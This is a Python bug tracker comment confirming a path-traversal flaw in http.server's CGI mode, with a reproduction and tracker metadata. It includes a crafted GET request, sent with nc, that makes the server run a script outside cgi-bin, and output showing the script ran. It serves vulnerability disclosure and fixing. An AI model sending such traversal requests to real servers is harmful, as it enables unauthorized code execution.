Christian Heimes added the comment:

I can confirm the issue:

$ mkdir www
$ cd www
$ cat << EOF > badscript.sh
#!/bin/sh
echo hacked
EOF
$ chmod +x badscript.sh
$ ../python -m http.server --cgi


$ echo "GET ///////////badscript.sh/../cgi-bin/cgi.sh HTTP/1.1" | nc localhost 8000
HTTP/1.0 200 Script output follows
Server: SimpleHTTP/0.6 Python/3.4.0a4+
Date: Tue, 29 Oct 2013 16:47:22 GMT
hacked

----------
assignee:  -> christian.heimes
nosy: +benjamin.peterson, georg.brandl, larry
priority: normal -> release blocker
stage:  -> test needed
versions: +Python 2.7, Python 3.3, Python 3.4

_______________________________________
Python tracker <rep...@bugs.python.org>
<http://bugs.python.org/issue19435>
_______________________________________